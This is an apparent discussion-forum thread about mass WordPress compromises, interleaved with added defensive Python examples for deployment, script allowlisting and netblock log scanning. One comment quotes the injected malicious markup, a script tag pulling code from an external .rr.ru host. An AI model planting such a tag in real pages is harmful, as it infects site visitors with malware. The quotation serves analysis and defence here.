Selectively disabling parts of the system to prevent the user from uninstalling the malware. Some may also prevent anti-malware programs from running, disable automatic system software updates and block access to websites of anti-malware vendors.

At least Norton tries to provide a working removal tool [symantec.com] at no charge. The only problem I've found is that it's made deliberately inaccessible to blind users (with a CAPTCHA) so that malware doesn't automatically run it on every computer that it tries to infect.

Oh Lord, please don't say that name! Poor Jim is still rocking himself in the corner going "It just won't uninstall! Why won't it uninstall? It just won't go away" after the last wave of Norton infected laptops came through and we have finally got his mumbling quieted down, please don't give Jim a flashback!

As for TFA this is why I recommend the combo of Win 7 with either Avast or Comodo IS along with Comodo Dragon with ABP. Windows 7 has DEP and ASLR along with UAC and Comodo Dragon is able to take advanta

Why do they always focus on the crap that's left behind when they analyse these things? I want to know how they managed to get that stuff on those servers so I can check my own. Was it an old and vulnerable WordPress or was it some 0-day they used?
For some reason they always focus on the effects and not on the causes.

Many of the blogs compromised in these recent attacks were running outdated WordPress versions, had vulnerable plug-ins installed or had weak administrative passwords susceptible to brute force attacks, said David Dede, a security researcher with website integrity monitoring firm Sucuri Security. "It seems the attackers are trying everything lately."

Some of that is Wordpress' fault for not having an easy way to run mass upgrades. My employer has 15 different sites running on Wordpress and the fact that I have to log in to each one manually after upgrading the files and click a link to handle the database update is annoying.

This drove me nuts at my current job for about 2 months - you need Wordpress Network [wordpress.org].

There's the easy way and the hard(er) way to do this:

This [wordpress.org] is the official easy way, but it's never worked for me (last tried in Spring of 2011). The nice thing is that it's all stuff built into WordPress, so you should be able to do it without any problems. I'd say it's probably worth giving this a try with one site, and if it works, run with it.

This [bavatuesdays.com] is a more down and dirty way that will definitely work, and is more or less how I did it. A little SQL editing never hurt anyone.
Also, this [sillybean.net] is a great companion to the bavatuesdays link. He goes on about his DNS in the first few paragraphs, but the second half of that post has some good details about where files need to be, and how links and such need to be updated.

Once you have a network, you have a fantastic "Update Network [wordpress.org]" button. Boom. Take the rest of the day off.

WordPress is extremely easy and quick to update. You can click a single button and update every single plugin and theme, or another button to update core. That's it. If you're upgrading by manually uploading files to a bunch of different servers for some reason, you should at least look into something like updating with Subversion [wordpress.org] or using multisite and just updating once for every site.

I used to love hand compiling everything but then I got my first full time sysadmin job. The job came with 20 servers and thankfully 15 of them ran Debian. When you have to do something repeatedly it gets old quickly so now I want the OS to do as much as possible and script most of the rest.

LOL. I've been a full time sys admin for ten years -- first with Solaris and FreeBSD servers, then in my current job with about 15 or so Gentoo (!) servers plus my laptop and a desktop. We migrated to Ubuntu about three years ago. In all honesty, we do a much better job of updating the Ubuntu servers than we did the Gentoo servers because it is so much easier to do, but I am starting to loathe my Ubuntu laptop. It's a lot easier to get wireless working in Ubuntu than Gentoo, but Unity, nVidia drivers*,

Well my clicking-averse friend, you need managewp.com. One login and a click or two, and you've updated all those 15 installs. Either that or migrate everything to multisite (Backup Buddy is great for that).

You mean "the fact that I have missed to write some working update/deployment script is annoying"?
Come on - it's not that hard. Just rsync anything but wp-content. Make sure they all have the same plugins installed but not necessarily activated and sync the plugins folder, too. That's for starters. The elegant way involves delivering images and "uploads" from a CDN and simply unpacking the new versions over the old ones by rsync, ftp or wget...
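The "rsync anything but wp-content" approach from the comment above, as an added example that is not the commenter's script: one pristine core tree is copied over several installs with the standard library, leaving wp-content, wp-config.php and .htaccess alone. The directory layout is constructed in a temp dir so the block runs as-is.

```python
"""Push one pristine WordPress core tree over several installs, leaving
wp-content and wp-config.php alone. The directory layout below is
constructed in a temp dir (assumed names) so the block runs as-is."""
import os
import shutil
import tempfile

# Site-specific top-level entries the new core must never overwrite.
PRESERVE = {"wp-content", "wp-config.php", ".htaccess"}


def deploy_core(core_dir, site_dir):
    """Copy core_dir over site_dir, skipping PRESERVE at the top level.
    Files dropped upstream are not removed (rsync --delete would)."""
    for root, dirs, files in os.walk(core_dir):
        rel = os.path.relpath(root, core_dir)
        if rel == ".":  # prune so os.walk never descends into preserved dirs
            dirs[:] = [d for d in dirs if d not in PRESERVE]
            files = [f for f in files if f not in PRESERVE]
        dest = os.path.normpath(os.path.join(site_dir, rel))
        os.makedirs(dest, exist_ok=True)
        for name in files:
            shutil.copy2(os.path.join(root, name), os.path.join(dest, name))


def _write(path, text):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as fh:
        fh.write(text)


def demo():
    """Build a core tree plus two sites, deploy to both, and return per site:
    (version.php text, wp-config.php text, plugin kept, bundled wp-content skipped)."""
    tmp = tempfile.mkdtemp()
    core = os.path.join(tmp, "wordpress")
    _write(os.path.join(core, "wp-includes", "version.php"), "NEW")
    _write(os.path.join(core, "wp-content", "index.php"), "bundled")  # real core ships one
    sites = [os.path.join(tmp, "site1"), os.path.join(tmp, "site2")]
    results = {}
    for s in sites:
        _write(os.path.join(s, "wp-includes", "version.php"), "OLD")
        _write(os.path.join(s, "wp-content", "plugins", "x.php"), "plugin")
        _write(os.path.join(s, "wp-config.php"), "DB_NAME")
        deploy_core(core, s)
        results[os.path.basename(s)] = (
            open(os.path.join(s, "wp-includes", "version.php")).read(),
            open(os.path.join(s, "wp-config.php")).read(),
            os.path.exists(os.path.join(s, "wp-content", "plugins", "x.php")),
            os.path.exists(os.path.join(s, "wp-content", "index.php")))
    shutil.rmtree(tmp)
    return results
```

Note that the core tarball's own wp-content directory is skipped too, so bundled default themes never overwrite a site's customised copies; the database upgrade step the earlier comment mentions still has to run per site.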

I personally think it's mostly a popularity thing, since WordPress pretty much owns the blog market. I think the other problem, however, is just with how simple they've made it to accidentally backdoor your site. There are thousands of plugins for WordPress, installable with just a couple of clicks, written by people who know nothing about security, or have possibly even maliciously left holes in their plugin. Unlike large projects that are generally maintained and reviewed by dozens of people, a plugin

A number of years ago, I encountered a fake Microsoft security warning while using my Linux computer. It said that Microsoft had detected viruses and spyware on my computer. This was on a Linux computer that did not have any Microsoft products installed on it.

It offered to do a free online scan of my hard drive. Despite clicking on No, a progress bar appeared as it started to do a fake scan of my hard drive. After about 60 seconds, it said that it had finished scanning my drive C. It then said that several

So it looks like the injected code
</DIV> <!-- END body-wrapper -->
<script src="http://ionis90landsi.rr.ru/mm.php?=1"></script>
</BODY>
</HTML>
would be taken care of with NoScript as long as your white list is short and doesn't contain rr.nu in this example.
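A server-side version of that short whitelist, as an added example rather than anything from the comment: scan a page for script tags loaded from hosts you have not approved. The HTML is constructed, with the injected tag quoted above placed before the closing body tag; `example.com` is an assumed allowed host.

```python
"""Find <script src=...> tags that load from hosts outside an allowlist.
The HTML below is constructed, with the injected tag from the comment
placed before </BODY>; cdn.example.com is an assumed legitimate host."""
import re
from urllib.parse import urlparse

SAMPLE_HTML = """<HTML><BODY>
<DIV id="body-wrapper">
<script src="/wp-includes/js/jquery/jquery.js?ver=1.7.1"></script>
<script src="//cdn.example.com/app.js"></script>
</DIV> <!-- END body-wrapper -->
<script src="http://ionis90landsi.rr.ru/mm.php?=1"></script>
</BODY>
</HTML>"""

# Tag case and attribute quoting vary between pages and injectors, so match
# case-insensitively and accept double, single or no quotes around src.
SCRIPT_SRC = re.compile(
    r"""<script\b[^>]*?\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""",
    re.IGNORECASE)


def host_of(src):
    """Host part of a script URL; '' for relative and root-relative paths."""
    if src.startswith("//"):  # protocol-relative URLs still name a host
        src = "http:" + src
    return (urlparse(src).hostname or "").lower()


def is_allowed(host, allowed_hosts):
    """NoScript-style match: the host itself or any subdomain of an entry."""
    return any(host == a or host.endswith("." + a) for a in allowed_hosts)


def find_unapproved_scripts(html, allowed_hosts):
    """Return [(line_number, src)] for external scripts from unapproved hosts."""
    allowed = [a.lower() for a in allowed_hosts]
    hits = []
    for lineno, line in enumerate(html.splitlines(), 1):
        for m in SCRIPT_SRC.finditer(line):
            src = next(g for g in m.groups() if g is not None)
            host = host_of(src)
            if host and not is_allowed(host, allowed):
                hits.append((lineno, src))
    return hits


if __name__ == "__main__":
    for lineno, src in find_unapproved_scripts(SAMPLE_HTML, ["example.com"]):
        print(f"line {lineno}: script loaded from unapproved host: {src}")
```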

It looks like the first step in the infection is via an IP (194.28.114.103) belonging to Specialist ISP of Transnistria [wikipedia.org]. That has featured before on Slashdot in this story [slashdot.org].

The block 194.28.112.0/22 is simply all evil (I've documented it here [dynamoo.com] in the past), there's no reason to send traffic to it at all, blocking it is a good option.
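To see whether that block is already talking to your servers, here is an added example (not from the comment) that flags access-log lines whose client address falls inside 194.28.112.0/22; the log lines are constructed, and the block boundary check shows why 194.28.116.x is outside the prefix.

```python
"""Flag web-server log lines whose client IP falls inside a known-bad netblock.
194.28.112.0/22 is the block named above and 194.28.114.103 from the earlier
comment sits inside it. The log lines are constructed, not real traffic."""
import ipaddress

BAD_BLOCKS = [ipaddress.ip_network("194.28.112.0/22")]

# Constructed Apache combined-format lines; the client IP is the first field.
SAMPLE_LOG = """\
194.28.114.103 - - [10/Mar/2012:03:14:07 +0000] "GET /wp-login.php HTTP/1.1" 200 1812 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Mar/2012:03:14:09 +0000] "GET /index.php HTTP/1.1" 200 9331 "-" "Mozilla/5.0"
194.28.115.255 - - [10/Mar/2012:03:14:11 +0000] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "-"
194.28.116.1 - - [10/Mar/2012:03:14:12 +0000] "GET /feed/ HTTP/1.1" 200 5120 "-" "-"
not-an-ip - - [10/Mar/2012:03:14:13 +0000] "GET / HTTP/1.1" 400 0 "-" "-"
"""


def block_bounds(block=BAD_BLOCKS[0]):
    """First and last address a prefix covers: 194.28.112.0/22 runs to .115.255,
    so .116.x is outside it even though it looks similar."""
    return str(block.network_address), str(block.broadcast_address)


def in_bad_block(ip_text, blocks=BAD_BLOCKS):
    """True if ip_text parses as an address inside any block; garbage in the
    client field counts as no match rather than aborting the scan."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False
    return any(ip in block for block in blocks)


def flag_log_lines(log_text, blocks=BAD_BLOCKS):
    """Return [(client_ip, request_line)] for hits from a bad block."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        client = line.split(" ", 1)[0]
        if in_bad_block(client, blocks):
            parts = line.split('"')
            hits.append((client, parts[1] if len(parts) > 1 else ""))
    return hits


if __name__ == "__main__":
    print("block covers", *block_bounds())
    for client, request in flag_log_lines(SAMPLE_LOG):
        print(client, "->", request)
```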

Exactly. It's a country that doesn't exist in the eyes of most other countries, which makes it beyond the reach of international law enforcement. There are other countries in the world like that, the difference with Transnistria is that it has a somewhat modern infrastructure.

I may be missing something - again, I'm a slackass. Anyone else have other advice for our admin-challenged friends besides "get a real software package"?

By the way, I was trying to lock down one of my WP installs to only allow authed users access to posts. However, WP does not put the assets for posts - usually in wp-content/uploads - behind the auth wall. It's just out there for the whole world to see. It was a simple fix to rewrite the .htaccess config for this directory to redirect to an auth script, but it still shocks me how insecure this app is.

BTW: why is Adobe allowed to - by default - check the box on their flash updates to also install Norton on the victims computer? How many trusting civilians (think: grandmothers) end up with borked computers with conflicting AV programs solely due to corporate greed? I'm willing to bet this check box (if it even appears) is NOT checked by default in the EU market. Man, I miss government FOR the people...